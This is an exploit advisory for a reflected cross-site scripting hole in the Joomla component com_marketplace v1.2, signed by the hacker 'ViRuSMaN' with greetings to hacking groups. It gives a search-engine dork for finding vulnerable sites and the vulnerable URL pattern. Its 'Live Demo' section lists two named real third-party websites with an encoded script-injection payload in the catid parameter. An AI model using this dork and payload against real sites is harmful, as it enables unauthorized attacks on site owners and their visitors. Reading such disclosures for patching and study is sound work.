============================================================================== __ __ __ __ __ __ / \ / \ \ \ / / / \ / \ / /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \ / / \ _ / \ \ \ \/ / / / \ _ / \ \ /_/ \_\ \__/ /_/ \_\ ============================================================================== [?] ~ Note : [ Tribute to the martyrs of Gaza . ] ============================================================================== [?] Joomla Component com_marketplace v1.2 [xss] Cross Site Scripting Vulnerability ============================================================================== [?] Script: [ com_marketplace ] [?] Dork: [ Marketplace Version 1.2 (c) 2005-2006 joomster.com ] [?] Language: [ PHP ] [?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ] [?] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] [?] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== [?] http://[target].com/[path]/index.php?option=com_marketplace&page=show_category&catid=[Xss Vuln] ===[ Live Demo ]=== [?] http://regiofirmen.de/joomla/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E [?] http://andrychow.info/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Author: ViRuSMaN <- ########################################################################### ________________________________ Windows Live Hotmail: Your friends can get your Facebook updates, right from Hotmail?.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009>